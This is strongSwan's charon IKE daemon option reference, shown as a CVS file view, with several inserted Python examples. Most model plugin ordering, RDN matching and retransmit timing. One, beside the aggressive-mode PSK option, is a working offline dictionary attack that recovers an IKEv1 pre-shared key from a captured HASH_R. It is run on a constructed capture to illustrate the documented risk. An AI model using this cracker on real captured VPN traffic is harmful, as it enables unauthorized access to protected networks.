File: [ELWIX - Embedded LightWeight unIX -] / embedaddon / strongswan / conf / options / charon.opt
Revision 1.1.1.2 (vendor branch)
Wed Mar 17 00:20:08 2021 UTC by misho
Branches: strongswan, MAIN
CVS tags: v5_9_2p0, HEAD
strongswan 5.9.2

    1: charon {}
    2: 	Options for the charon IKE daemon.
    3: 
    4: 	Options for the charon IKE daemon.
    5: 
    6: 	**Note**: Many of the options in this section also apply to **charon-cmd**
    7: 	and other **charon** derivatives.  Just use their respective name (e.g.
    8: 	**charon-cmd** instead of **charon**). For many options defaults can be
    9: 	defined in the **libstrongswan** section.
   10: 
   11: charon.accept_private_algs = no
   12: 	Deliberately violate the IKE standard's requirement and allow the use of
   13: 	private algorithm identifiers, even if the peer implementation is unknown.
   14: 
   15: charon.accept_unencrypted_mainmode_messages = no
   16: 	Accept unencrypted ID and HASH payloads in IKEv1 Main Mode.
   17: 
   18: 	Accept unencrypted ID and HASH payloads in IKEv1 Main Mode.
   19: 
   20: 	Some implementations send the third Main Mode message unencrypted, probably
   21: 	to find the PSKs for the specified ID for authentication. This is very
   22: 	similar to Aggressive Mode, and has the same security implications: A
   23: 	passive attacker can sniff the negotiated Identity, and start brute forcing
   24: 	the PSK using the HASH payload.
   25: 
   26: 	It is recommended to keep this option at no, unless you know exactly
   27: 	what the implications are and require compatibility with such devices (for
   28: 	example, some SonicWall boxes).
   29: 
   30: charon.block_threshold = 5
   31: 	Maximum number of half-open IKE_SAs for a single peer IP.
   32: 
   33: charon.cert_cache = yes
   34: 	Whether relations in validated certificate chains should be cached in
   35: 	memory.
   36: 
   37: charon.cache_crls = no
   38: 	Whether Certificate Revocation Lists (CRLs) fetched via HTTP or LDAP should
   39: 	be saved under a unique file name derived from the public key of the
   40: 	Certification Authority (CA) to **/etc/ipsec.d/crls** (stroke) or
   41: 	**/etc/swanctl/x509crl** (vici), respectively.
   42: 
   43: charon.check_current_path = no
   44: 	Whether to use DPD to check if the current path still works after any
   45: 	changes to interfaces/addresses.
   46: 
   47: 	By default, after detecting any changes to interfaces and/or addresses no
   48: 	action is taken if the current path to the remote peer still looks usable.
   49: 	Enabling this option will use DPD to check whether the path actually still
   50: 	works, or whether, for instance, the peer removed its state after a longer
   51: 	period without connectivity.  It will also trigger a MOBIKE update if NAT
   52: 	mappings were removed during the downtime.
   53: 
   54: charon.cisco_flexvpn = no
   55: 	Send the Cisco FlexVPN vendor ID payload (IKEv2 only).
   56: 
   57: 	Send the Cisco FlexVPN vendor ID payload, which is required in order to make
   58: 	Cisco brand devices allow negotiating a local traffic selector (from
   59: 	strongSwan's point of view) that is not the assigned virtual IP address if
   60: 	such an address is requested by strongSwan.  Sending the Cisco FlexVPN
   61: 	vendor ID prevents the peer from narrowing the initiator's local traffic
   62: 	selector and allows it to e.g. negotiate a TS of 0.0.0.0/0 == 0.0.0.0/0
   63: 	instead.  This has been tested with a "tunnel mode ipsec ipv4" Cisco
   64: 	template but should also work for GRE encapsulation.
   65: 
   66: charon.cisco_unity = no
   67: 	Send Cisco Unity vendor ID payload (IKEv1 only).
   68: 
   69: charon.close_ike_on_child_failure = no
   70: 	Close the IKE_SA if setup of the CHILD_SA along with IKE_AUTH failed.
   71: 
   72: charon.cookie_threshold = 10
   73: 	Number of half-open IKE_SAs that activate the cookie mechanism.
   74: 
   75: charon.crypto_test.bench = no
   76: 	Benchmark crypto algorithms and order them by efficiency.
   77: 
   78: charon.crypto_test.bench_size = 1024
   79: 	Buffer size used for crypto benchmark.
   80: 
   81: charon.crypto_test.bench_time = 50
   82: 	Time in ms during which crypto algorithm performance is measured.
   83: 
   84: charon.crypto_test.on_add = no
   85: 	Test crypto algorithms during registration (requires test vectors provided
   86: 	by the _test-vectors_ plugin).
   87: 
   88: charon.crypto_test.on_create = no
   89: 	Test crypto algorithms on each crypto primitive instantiation.
   90: 
   91: charon.crypto_test.required = no
   92: 	Strictly require at least one test vector to enable an algorithm.
   93: 
   94: charon.crypto_test.rng_true = no
   95: 	Whether to test RNG with TRUE quality; requires a lot of entropy.
   96: 
   97: charon.delete_rekeyed = no
   98: 	Delete CHILD_SAs right after they got successfully rekeyed (IKEv1 only).
   99: 
  100: 	Delete CHILD_SAs right after they got successfully rekeyed (IKEv1 only).
  101: 	Reduces the number of stale CHILD_SAs in scenarios with a lot of rekeyings.
  102: 	However, this might cause problems with implementations that continue to
  103: 	use rekeyed SAs until they expire.
  104: 
  105: charon.delete_rekeyed_delay = 5
  106: 	Delay in seconds until inbound IPsec SAs are deleted after rekeyings (IKEv2
  107: 	only).
  108: 
  109: 	Delay in seconds until inbound IPsec SAs are deleted after rekeyings (IKEv2
  110: 	only). To process delayed packets the inbound part of a CHILD_SA is kept
  111: 	installed up to the configured number of seconds after it got replaced
  112: 	during a rekeying. If set to 0 the CHILD_SA will be kept installed until it
  113: 	expires (if no lifetime is set it will be destroyed immediately).
  114: 
  115: charon.dh_exponent_ansi_x9_42 = yes
  116: 	If enabled, use the ANSI X9.42 DH exponent size; otherwise use the optimum
  117: 	exponent size matched to the cryptographic strength of the group.
  118: 
  119: charon.dlopen_use_rtld_now = no
  120: 	Use RTLD_NOW with dlopen when loading plugins and IMV/IMCs to reveal missing
  121: 	symbols immediately.
  122: 
  123: charon.dns1
  124: 	DNS server assigned to peer via configuration payload (CP).
  125: 
  126: charon.dns2
  127: 	DNS server assigned to peer via configuration payload (CP).
  128: 
  129: charon.dos_protection = yes
  130: 	Enable Denial of Service protection using cookies and aggressiveness checks.
  131: 
  132: charon.flush_auth_cfg = no
  133: 	Free objects during authentication (might conflict with plugins).
  134: 
  135: 	If enabled objects used during authentication (certificates, identities
  136: 	etc.) are released to free memory once an IKE_SA is established. Enabling
  137: 	this might conflict with plugins that later need access to e.g. the used
  138: 	certificates.
  139: 
  140: charon.follow_redirects = yes
  141: 	Whether to follow IKEv2 redirects (RFC 5685).
  142: 
  143: charon.force_eap_only_authentication = no
  144: 	Violate RFC 5998 and use EAP-only authentication even if the peer did not
  145: 	send an EAP_ONLY_AUTHENTICATION notify during IKE_AUTH.
  146: 
  147: charon.fragment_size = 1280
  148: 	Maximum size (complete IP datagram size in bytes) of a sent IKE fragment
  149: 	when using proprietary IKEv1 or standardized IKEv2 fragmentation, defaults
  150: 	to 1280 (use 0 for address family specific default values, which uses a
  151: 	lower value for IPv4).  If specified this limit is used for both IPv4 and
  152: 	IPv6.
  153: 
  154: charon.group
  155: 	Name of the group the daemon changes to after startup.
  156: 
  157: charon.half_open_timeout = 30
  158: 	Timeout in seconds for connecting IKE_SAs (also see IKE_SA_INIT DROPPING).
  159: 
  160: charon.hash_and_url = no
  161: 	Enable hash and URL support.
  162: 
  163: charon.host_resolver.max_threads = 3
  164: 	Maximum number of concurrent resolver threads (they are terminated if
  165: 	unused).
  166: 
  167: charon.host_resolver.min_threads = 0
  168: 	Minimum number of resolver threads to keep around.
  169: 
  170: charon.i_dont_care_about_security_and_use_aggressive_mode_psk = no
  171: 	Allow IKEv1 Aggressive Mode with pre-shared keys as responder.
  172: 
  173: 	If enabled responders are allowed to use IKEv1 Aggressive Mode with
  174: 	pre-shared keys, which is discouraged due to security concerns (offline
  175: 	attacks on the openly transmitted hash of the PSK).
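
The offline attack that this option and charon.accept_unencrypted_mainmode_messages above both warn about, shown as an added example that is not part of strongSwan or of this file. Everything the responder feeds into HASH_R except the PSK is sent in the clear, so a passive capture is enough to test guesses at the attacker's leisure. The transcript below is constructed (random wire values, a made-up responder identity vpn.example.com and a made-up wordlist); the HASH_R and SKEYID formulas are those of RFC 2409, section 5.4.

```python
"""Offline dictionary attack on an IKEv1 pre-shared key.

With Aggressive Mode (or the unencrypted Main Mode variant some devices
use) the responder's HASH_R travels in the clear, and every input to it
except the PSK is also on the wire. RFC 2409, section 5.4:

    SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

where prf is HMAC with the negotiated hash algorithm.
"""
import dataclasses
import hmac
import os
from typing import Iterable, Optional


@dataclasses.dataclass(frozen=True)
class Ikev1Transcript:
    """Values an eavesdropper collects from one Aggressive Mode exchange."""
    cky_i: bytes       # initiator cookie (8 bytes)
    cky_r: bytes       # responder cookie (8 bytes)
    sa_i_b: bytes      # body of the initiator's SA payload
    g_xi: bytes        # initiator's DH public value
    g_xr: bytes        # responder's DH public value
    ni_b: bytes        # initiator nonce body
    nr_b: bytes        # responder nonce body
    id_ir_b: bytes     # body of the responder's ID payload
    hash_r: bytes      # HASH_R as sent by the responder
    prf: str = "sha1"  # negotiated hash; the prf is HMAC-<hash>


def skeyid_psk(psk: bytes, t: Ikev1Transcript) -> bytes:
    """SKEYID for pre-shared key authentication."""
    return hmac.new(psk, t.ni_b + t.nr_b, t.prf).digest()


def hash_r(psk: bytes, t: Ikev1Transcript) -> bytes:
    """HASH_R the responder would send if it held this PSK."""
    msg = t.g_xr + t.g_xi + t.cky_r + t.cky_i + t.sa_i_b + t.id_ir_b
    return hmac.new(skeyid_psk(psk, t), msg, t.prf).digest()


def crack_psk(t: Ikev1Transcript, wordlist: Iterable[str]) -> Optional[bytes]:
    """Return the first candidate whose HASH_R equals the captured one.

    Two HMACs per guess and no interaction with the gateway: the attack is
    bounded only by the attacker's hardware and the entropy of the PSK.
    """
    for candidate in wordlist:
        psk = candidate.encode()
        if hmac.compare_digest(hash_r(psk, t), t.hash_r):
            return psk
    return None


def make_transcript(psk: bytes, prf: str = "sha1") -> Ikev1Transcript:
    """Constructed sample standing in for a packet capture.

    Wire values are random; HASH_R is computed the way a responder holding
    `psk` would compute it. Nothing here comes from a real device.
    """
    t = Ikev1Transcript(
        cky_i=os.urandom(8), cky_r=os.urandom(8),
        sa_i_b=os.urandom(40),                       # a real SA body encodes the proposal
        g_xi=os.urandom(128), g_xr=os.urandom(128),  # MODP-1024 sized public values
        ni_b=os.urandom(20), nr_b=os.urandom(20),
        id_ir_b=b"\x02\x00\x00\x00vpn.example.com",  # ID_FQDN (type 2), proto/port 0
        hash_r=b"", prf=prf,
    )
    return dataclasses.replace(t, hash_r=hash_r(psk, t))


# Constructed capture of a gateway whose PSK is the dictionary word "hunter2".
SAMPLE_CAPTURE = make_transcript(b"hunter2")
SAMPLE_WORDLIST = ["password", "letmein", "hunter2", "admin"]

if __name__ == "__main__":
    print(crack_psk(SAMPLE_CAPTURE, SAMPLE_WORDLIST))
```

This is the same computation tools such as ike-scan's psk-crack perform on real captures; the only defence, besides leaving both options at no, is a PSK with enough entropy that the dictionary never contains it, or certificate or EAP based authentication instead.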
  176: 
  177: charon.ignore_routing_tables
  178: 	A space-separated list of routing tables to be excluded from route lookups.
  179: 
  180: charon.ignore_acquire_ts = no
  181: 	Whether to ignore the traffic selectors from the kernel's acquire events for
  182: 	IKEv2 connections (they are not used for IKEv1).
  183: 
  184: 	If this is disabled, the traffic selectors from the kernel's acquire events,
  185: 	which are derived from the triggering packet, are prepended to the traffic
  186: 	selectors from the configuration for IKEv2 connections. By enabling this,
  187: 	such specific traffic selectors will be ignored and only the ones in the
  188: 	config will be sent. This always happens for IKEv1 connections as the
  189: 	protocol only supports one set of traffic selectors per CHILD_SA.
  190: 
  191: charon.ikesa_limit = 0
  192: 	Maximum number of IKE_SAs that can be established at the same time before
  193: 	new connection attempts are blocked.
  194: 
  195: charon.ikesa_table_segments = 1
  196: 	Number of exclusively locked segments in the hash table.
  197: 
  198: charon.ikesa_table_size = 1
  199: 	Size of the IKE_SA hash table.
  200: 
  201: charon.inactivity_close_ike = no
  202: 	Whether to close IKE_SA if the only CHILD_SA closed due to inactivity.
  203: 
  204: charon.init_limit_half_open = 0
  205: 	Limit new connections based on the current number of half open IKE_SAs, see
  206: 	IKE_SA_INIT DROPPING in **strongswan.conf**(5).
  207: 
  208: charon.init_limit_job_load = 0
  209: 	Limit new connections based on the number of queued jobs.
  210: 
  211: 	Limit new connections based on the number of jobs currently queued for
  212: 	processing (see IKE_SA_INIT DROPPING).
  213: 
  214: charon.initiator_only = no
  215: 	Causes charon daemon to ignore IKE initiation requests.
  216: 
  217: charon.install_routes = yes
  218: 	Install routes into a separate routing table for established IPsec tunnels.
  219: 
  220: charon.install_virtual_ip = yes
  221: 	Install virtual IP addresses.
  222: 
  223: charon.install_virtual_ip_on
  224: 	The name of the interface on which virtual IP addresses should be installed.
  225: 
  226: 	The name of the interface on which virtual IP addresses should be installed.
  227: 	If not specified the addresses will be installed on the outbound interface.
  228: 
  229: charon.integrity_test = no
  230: 	Check daemon, libstrongswan and plugin integrity at startup.
  231: 
  232: charon.interfaces_ignore
  233: 	A comma-separated list of network interfaces that should be ignored. If
  234: 	**interfaces_use** is specified this option has no effect.
  235: 
  236: charon.interfaces_use
  237: 	A comma-separated list of network interfaces that should be used by charon.
  238: 	All other interfaces are ignored.
  239: 
  240: charon.keep_alive = 20s
  241: 	NAT keep alive interval.
  242: 
  243: charon.keep_alive_dpd_margin = 0s
  244: 	Number of seconds the keep alive interval may be exceeded before a DPD is
  245: 	sent instead of a NAT keep alive (0 to disable).  This is only useful if a
  246: 	clock is used that includes time spent suspended (e.g. CLOCK_BOOTTIME).
  247: 
  248: charon.leak_detective.detailed = yes
  249: 	Includes source file names and line numbers in leak detective output.
  250: 
  251: charon.leak_detective.usage_threshold = 10240
  252: 	Threshold in bytes for leaks to be reported (0 to report all).
  253: 
  254: charon.leak_detective.usage_threshold_count = 0
  255: 	Threshold in number of allocations for leaks to be reported (0 to report
  256: 	all).
  257: 
  258: charon.load
  259: 	Plugins to load in the IKE daemon charon.
  260: 
  261: charon.load_modular = no
  262: 	Determine plugins to load via each plugin's load option.
  263: 
  264: 	If enabled, the list of plugins to load is determined via the value of the
  265: 	_charon.plugins.<name>.load_ options.  In addition to a simple boolean flag
  266: 	that option may take an integer value indicating the priority of a plugin,
  267: 	which would influence the order of a plugin in the plugin list (the default
  268: 	is 1). If two plugins have the same priority their order in the default
  269: 	plugin list is preserved. Enabled plugins not found in that list are ordered
  270: 	alphabetically before other plugins with the same priority.
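
The ordering rules in the paragraph above, as an added example: a small model written for this page, not charon's plugin loader. The default plugin list, the plugin names and the load values are constructed. Two points the text leaves implicit are treated as assumptions here: a larger priority number means earlier loading, and a load value of 0 (or an absent load option) means the plugin is not loaded.

```python
"""Model of the plugin ordering described for charon.load_modular.

Added example, not strongSwan's plugin loader. Inputs are the daemon's
default plugin list (the order it would use without load_modular) and
the charon.plugins.<name>.load values.
"""
from typing import Dict, List, Optional, Union

LoadValue = Union[bool, int, str, None]

# Constructed sample, not charon's real default list.
DEFAULT_PLUGIN_LIST = [
    "random", "nonce", "x509", "openssl", "kernel-netlink", "socket-default",
]

# Constructed charon.plugins.<name>.load values (socket-default has none).
SAMPLE_CONFIG: Dict[str, LoadValue] = {
    "random": "yes",
    "nonce": 2,
    "x509": "no",
    "openssl": True,
    "kernel-netlink": "yes",
    "vici": "yes",        # enabled but not in the default list
    "mylogger": "3",      # enabled, high priority, not in the default list
}


def load_priority(value: LoadValue) -> Optional[int]:
    """Priority for a load value, or None if the plugin is not loaded.

    yes/true -> 1 (the default priority), no/false -> not loaded, an
    integer -> that priority. Assumption: 0 and a missing option (None)
    both mean not loaded.
    """
    if value is None or value is False:
        return None
    if value is True:
        return 1
    if isinstance(value, str):
        v = value.strip().lower()
        if v in ("yes", "true", "enabled"):
            return 1
        if v in ("no", "false", "disabled", ""):
            return None
        value = int(v)  # anything else must be a number
    return value if value > 0 else None


def modular_load_order(config: Dict[str, LoadValue],
                       default_list: List[str] = DEFAULT_PLUGIN_LIST) -> List[str]:
    """Order plugins as the load_modular description states.

    1. higher priority first (assumption: larger number loads earlier);
    2. same priority: plugins absent from the default list first, alphabetically;
    3. then plugins from the default list, in their default order.
    """
    position = {name: i for i, name in enumerate(default_list)}
    enabled = [(name, prio) for name, value in config.items()
               if (prio := load_priority(value)) is not None]

    def key(item):
        name, prio = item
        if name in position:
            return (-prio, 1, "", position[name])
        return (-prio, 0, name, 0)

    return [name for name, _ in sorted(enabled, key=key)]


if __name__ == "__main__":
    # The equivalent of what a plain charon.load line would have to spell out.
    print("load =", " ".join(modular_load_order(SAMPLE_CONFIG)))
```

With the sample values the result is mylogger (priority 3), nonce (priority 2), then at the default priority vici before the default-list plugins random, openssl and kernel-netlink; x509 is disabled and socket-default, which has no load option, is not loaded at all. That last point is the operational trap with load_modular: a plugin without an explicit load option silently disappears.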
  271: 
  272: charon.max_ikev1_exchanges = 3
  273: 	Maximum number of IKEv1 phase 2 exchanges per IKE_SA to keep state about and
  274: 	track concurrently.
  275: 
  276: charon.max_packet = 10000
  277: 	Maximum packet size accepted by charon.
  278: 
  279: charon.make_before_break = no
  280: 	Initiate IKEv2 reauthentication with a make-before-break scheme.
  281: 
  282: 	Initiate IKEv2 reauthentication with a make-before-break instead of a
  283: 	break-before-make scheme. Make-before-break uses overlapping IKE and
  284: 	CHILD_SA during reauthentication by first recreating all new SAs before
  285: 	deleting the old ones. This behavior can be beneficial to avoid connectivity
  286: 	gaps during reauthentication, but requires support for overlapping SAs by
  287: 	the peer. strongSwan can handle such overlapping SAs since version 5.3.0.
  288: 
  289: charon.multiple_authentication = yes
  290: 	Enable multiple authentication exchanges (RFC 4739).
  291: 
  292: charon.nbns1
  293: 	WINS servers assigned to peer via configuration payload (CP).
  294: 
  295: charon.nbns2
  296: 	WINS servers assigned to peer via configuration payload (CP).
  297: 
  298: charon.port = 500
  299: 	UDP port used locally. If set to 0 a random port will be allocated.
  300: 
  301: charon.port_nat_t = 4500
  302: 	UDP port used locally in case of NAT-T. If set to 0 a random port will be
  303: 	allocated.  Has to be different from **charon.port**, otherwise a random
  304: 	port will be allocated.
  305: 
  306: charon.prefer_best_path = no
  307: 	Whether to prefer updating SAs to the path with the best route.
  308: 
  309: 	By default, charon keeps SAs on the routing path with addresses it
  310: 	previously used if that path is still usable. By setting this option to
  311: 	yes, it tries more aggressively to update SAs with MOBIKE on routing
  312: 	priority changes using the cheapest path. This adds more noise, but allows
  313: 	SAs to adapt dynamically to routing priority changes. This option has no
  314: 	effect if MOBIKE is not supported or disabled.
  315: 
  316: charon.prefer_configured_proposals = yes
  317: 	Prefer locally configured proposals for IKE/IPsec over supplied ones as
  318: 	responder (disabling this can avoid keying retries due to INVALID_KE_PAYLOAD
  319: 	notifies).
  320: 
  321: charon.prefer_temporary_addrs = no
  322: 	Controls whether permanent or temporary IPv6 addresses are used as source,
  323: 	or announced as additional addresses if MOBIKE is used.
  324: 
  325: 	By default, permanent IPv6 source addresses are preferred over temporary
  326: 	ones (RFC 4941), to make connections more stable. Enable this option to
  327: 	reverse this.
  328: 
  329: 	It also affects which IPv6 addresses are announced as additional addresses
  330: 	if MOBIKE is used.  If the option is disabled, only permanent addresses are
  331: 	sent, and only temporary ones if it is enabled.
  332: 
  333: charon.process_route = yes
  334: 	Process RTM_NEWROUTE and RTM_DELROUTE events.
  335: 
  336: charon.processor.priority_threads {}
  337: 	Section to configure the number of reserved threads per priority class,
  338: 	see JOB PRIORITY MANAGEMENT in **strongswan.conf**(5).
  339: 
  340: charon.rdn_matching = strict
  341: 	How RDNs in subject DNs of certificates are matched against configured
  342: 	identities (_strict_, _reordered_, or _relaxed_).
  343: 
  344: 	How RDNs in subject DNs of certificates are matched against configured
  345: 	identities. Possible values are _strict_ (the default), _reordered_, and
  346: 	_relaxed_. With _strict_ the number, type and order of all RDNs has to
  347: 	match, wildcards (*) for the values of RDNs are allowed (that's the case
  348: 	for all three variants). Using _reordered_ also matches DNs if the RDNs
  349: 	appear in a different order, the number and type still has to match.
  350: 	Finally, _relaxed_ also allows matches of DNs that contain more RDNs than
  351: 	the configured identity (missing RDNs are treated like a wildcard match).
  352: 
  353: 	Note that _reordered_ and _relaxed_ impose a considerable overhead on memory
  354: 	usage and runtime, in particular, for mismatches, compared to _strict_.
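
The three matching modes described above, as an added example written for this page (a model, not strongSwan's identification code). DNs are handled as lists of (type, value) RDNs; the parser is deliberately simple (comma separated, no escaping, no multi-valued RDNs) and values are compared as plain strings, so case and encoding differences that real certificates exhibit are not modelled. Wildcards are honoured only in the configured identity, never in the certificate subject.

```python
"""Model of the three charon.rdn_matching modes (strict, reordered, relaxed).

Added example, not strongSwan code. Simplified DN parsing and plain string
comparison of values; wildcards (*) count only on the configured side.
"""
from typing import List, Tuple

RDN = Tuple[str, str]


def parse_dn(dn: str) -> List[RDN]:
    """'C=CH, O=strongSwan, CN=moon' -> [('C','CH'), ('O','strongSwan'), ('CN','moon')]."""
    rdns = []
    for part in dn.split(","):
        attr, sep, value = part.strip().partition("=")
        if not sep:
            raise ValueError(f"not an RDN: {part!r}")
        rdns.append((attr.strip().upper(), value.strip()))
    return rdns


def rdn_matches(configured: RDN, actual: RDN) -> bool:
    """Types must agree; the configured value must be * or equal to the actual one."""
    return configured[0] == actual[0] and configured[1] in ("*", actual[1])


def _match_unordered(configured: List[RDN], actual: List[RDN]) -> bool:
    """Assign every configured RDN to a distinct RDN of the subject.

    Exact values are assigned before wildcards so that e.g. 'OU=*, OU=dev'
    still matches a subject carrying 'OU=dev, OU=ops'. The nested scan is
    what makes reordered/relaxed cost more than strict, most of all on
    mismatches, as the note above says.
    """
    remaining = list(actual)
    for rdn in sorted(configured, key=lambda r: r[1] == "*"):
        for i, cand in enumerate(remaining):
            if rdn_matches(rdn, cand):
                del remaining[i]
                break
        else:
            return False
    return True


def dn_matches(configured_dn: str, subject_dn: str, mode: str = "strict") -> bool:
    """Match a certificate subject against a configured identity."""
    configured, subject = parse_dn(configured_dn), parse_dn(subject_dn)
    if mode == "strict":        # same count, same types, same order
        return len(configured) == len(subject) and all(
            rdn_matches(c, s) for c, s in zip(configured, subject))
    if mode == "reordered":     # same count and types, any order
        return len(configured) == len(subject) and _match_unordered(configured, subject)
    if mode == "relaxed":       # subject may carry additional RDNs
        return _match_unordered(configured, subject)
    raise ValueError(f"unknown rdn_matching mode: {mode}")


if __name__ == "__main__":
    identity = "C=CH, O=strongSwan, CN=*"
    for subject in ("C=CH, O=strongSwan, CN=moon",
                    "O=strongSwan, C=CH, CN=moon",
                    "C=CH, O=strongSwan, OU=Research, CN=moon"):
        print(subject, [m for m in ("strict", "reordered", "relaxed")
                        if dn_matches(identity, subject, m)])
```

The security-relevant consequence of relaxed is visible in the last function: a subject with extra RDNs (for example an added OU) matches an identity that never mentioned them, so a CA that issues such certificates to other parties widens who can satisfy the configured identity. Keep strict unless a peer's certificate actually needs the looser matching.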
  355: 
  356: charon.receive_delay = 0
  357: 	Delay in ms for receiving packets, to simulate larger RTT.
  358: 
  359: charon.receive_delay_response = yes
  360: 	Delay response messages.
  361: 
  362: charon.receive_delay_request = yes
  363: 	Delay request messages.
  364: 
  365: charon.receive_delay_type = 0
  366: 	Specific IKEv2 message type to delay, 0 for any.
  367: 
  368: charon.replay_window = 32
  369: 	Size of the AH/ESP replay window, in packets.
  370: 
  371: charon.retransmit_base = 1.8
  372: 	Base to use for calculating exponential back off, see IKEv2 RETRANSMISSION
  373: 	in **strongswan.conf**(5).
  374: 
  375: charon.retransmit_timeout = 4.0
  376: 	Timeout in seconds before sending first retransmit.
  377: 
  378: charon.retransmit_tries = 5
  379: 	Number of times to retransmit a packet before giving up.
  380: 
  381: charon.retransmit_jitter = 0
  382: 	Maximum jitter in percent to apply randomly to calculated retransmission
  383: 	timeout (0 to disable).
  384: 
  385: charon.retransmit_limit = 0
  386: 	Upper limit in seconds for calculated retransmission timeout (0 to disable).
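
How the five retransmit options above combine, as an added example (not strongSwan code). It follows the formula documented in the IKEv2 RETRANSMISSION section of strongswan.conf(5), relative timeout = retransmit_timeout * retransmit_base ^ n, with n = 0 for the wait before the first retransmit; the retransmits are followed by one more timeout before the IKE_SA is given up. Two details are assumptions made here: the retransmit_limit cap is applied before the jitter, and the jitter shortens a timeout by a random amount of up to the configured percentage.

```python
"""IKEv2 retransmission schedule from the charon.retransmit_* options.

Added example, not strongSwan code. Formula from strongswan.conf(5):
relative timeout = retransmit_timeout * retransmit_base ^ n. The cap
before jitter and the jitter-as-reduction are assumptions of this model.
"""
import random
from typing import List, Optional


def retransmission_timeout(n: int, timeout: float = 4.0, base: float = 1.8,
                           limit: float = 0.0, jitter: float = 0.0,
                           rng: Optional[random.Random] = None) -> float:
    """Seconds to wait after the n-th transmission (n = 0 is the first send)."""
    t = timeout * base ** n
    if limit:                   # retransmit_limit, 0 disables the cap
        t = min(t, limit)
    if jitter:                  # retransmit_jitter in percent, 0 disables
        rng = rng or random.Random()
        t -= (t / 100.0) * jitter * rng.random()
    return t


def schedule(tries: int = 5, timeout: float = 4.0, base: float = 1.8,
             limit: float = 0.0) -> List[float]:
    """Relative timeouts: one per retransmission plus the final wait before giving up."""
    return [retransmission_timeout(n, timeout, base, limit) for n in range(tries + 1)]


def absolute_times(**kwargs) -> List[float]:
    """Seconds after the first send at which each retransmit happens; the last entry is the give-up time."""
    out, elapsed = [], 0.0
    for t in schedule(**kwargs):
        elapsed += t
        out.append(elapsed)
    return out


def time_to_give_up(**kwargs) -> float:
    """How long an unresponsive peer keeps an IKE_SA alive before it is torn down."""
    return sum(schedule(**kwargs))


if __name__ == "__main__":
    for label, kw in (("defaults", {}),
                      ("limit=20", {"limit": 20.0}),
                      ("tries=3, timeout=2", {"tries": 3, "timeout": 2.0})):
        print(f"{label:20} retransmits at {[round(x, 1) for x in absolute_times(**kw)][:-1]}"
              f"  give up after {time_to_give_up(**kw):.1f}s")
```

With the defaults this reproduces the man page's table: retransmits at 4, 11, 24, 47 and 89 seconds and the IKE_SA given up after about 165 seconds. Capping with retransmit_limit = 20 brings that down to about 84 seconds, which is the knob to turn when a dead peer must be noticed quickly without making the early retransmits more aggressive.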
  387: 
  388: charon.retry_initiate_interval = 0
  389: 	Interval in seconds to use when retrying to initiate an IKE_SA (e.g. if DNS
  390: 	resolution failed), 0 to disable retries.
  391: 
  392: charon.reuse_ikesa = yes
  393: 	Initiate CHILD_SA within existing IKE_SAs (always enabled for IKEv1).
  394: 
  395: charon.routing_table
  396: 	Numerical routing table to install routes to.
  397: 
  398: charon.routing_table_prio
  399: 	Priority of the routing table.
  400: 
  401: charon.rsa_pss = no
  402: 	Whether to use RSA with PSS padding instead of PKCS#1 padding by default.
  403: 
  404: charon.send_delay = 0
  405: 	Delay in ms for sending packets, to simulate larger RTT.
  406: 
  407: charon.send_delay_response = yes
  408: 	Delay response messages.
  409: 
  410: charon.send_delay_request = yes
  411: 	Delay request messages.
  412: 
  413: charon.send_delay_type = 0
  414: 	Specific IKEv2 message type to delay, 0 for any.
  415: 
  416: charon.send_vendor_id = no
  417: 	Send strongSwan vendor ID payload.
  418: 
  419: charon.signature_authentication = yes
  420: 	Whether to enable Signature Authentication as per RFC 7427.
  421: 
  422: charon.signature_authentication_constraints = yes
  423: 	Whether to enable constraints against IKEv2 signature schemes.
  424: 
  425: 	If enabled, signature schemes configured in _rightauth_, in addition to
  426: 	being used as constraints against the signature schemes employed in the
  427: 	certificate chain, are also used as constraints against the signature scheme
  428: 	used by peers during IKEv2 authentication.
  429: 
  430: charon.spi_label = 0x0000000000000000
  431: 	Value mixed into the local IKE SPIs after applying _spi_mask_.
  432: 
  433: charon.spi_mask = 0x0000000000000000
  434: 	Mask applied to local IKE SPIs before mixing in _spi_label_ (bits set will
  435: 	be replaced with _spi_label_).
  436: 
  437: charon.spi_min = 0xc0000000
  438: 	The lower limit for SPIs requested from the kernel for IPsec SAs.
  439: 
  440: 	The lower limit for SPIs requested from the kernel for IPsec SAs. Should not
  441: 	be set lower than 0x00000100 (256), as SPIs between 1 and 255 are reserved
  442: 	by IANA.
  443: 
  444: charon.spi_max = 0xcfffffff
  445: 	The upper limit for SPIs requested from the kernel for IPsec SAs.
  446: 
  447: charon.start-scripts {}
  448: 	Section containing a list of scripts (name = path) that are executed when
  449: 	the daemon is started.
  450: 
  451: charon.stop-scripts {}
  452: 	Section containing a list of scripts (name = path) that are executed when
  453: 	the daemon is terminated.
  454: 
  455: charon.threads = 16
  456: 	Number of worker threads in charon.
  457: 
  458: 	Number of worker threads in charon. Several of these are reserved for long
  459: 	running tasks in internal modules and plugins. Therefore, make sure you
  460: 	don't set this value too low. The number of idle worker threads listed in
  461: 	_ipsec statusall_ can be used as an indicator of the number of reserved
  462: 	threads.
  463: 
  464: charon.tls.cipher
  465: 	List of TLS encryption ciphers.
  466: 
  467: charon.tls.key_exchange
  468: 	List of TLS key exchange methods.
  469: 
  470: charon.tls.mac
  471: 	List of TLS MAC algorithms.
  472: 
  473: charon.tls.suites
  474: 	List of TLS cipher suites.
  475: 
  476: charon.tls.ke_group
  477: 	List of TLS key exchange groups.
  478: 
  479: charon.tls.signature
  480: 	List of TLS signature schemes.
  481: 
  482: charon.tls.send_certreq_authorities = yes
  483: 	Whether to include CAs in a server's CertificateRequest message.
  484: 
  485: 	Whether to include CAs in a server's CertificateRequest message. May be
  486: 	disabled if clients can't handle a long list of CAs.
  487: 
  488: charon.tls.version_min = 1.2
  489: 	Minimum TLS version to negotiate.
  490: 
  491: charon.tls.version_max = 1.2
  492: 	Maximum TLS version to negotiate.
  493: 
  494: charon.user
  495: 	Name of the user the daemon changes to after startup.
  496: 
  497: charon.x509.enforce_critical = yes
  498: 	Discard certificates with unsupported or unknown critical extensions.
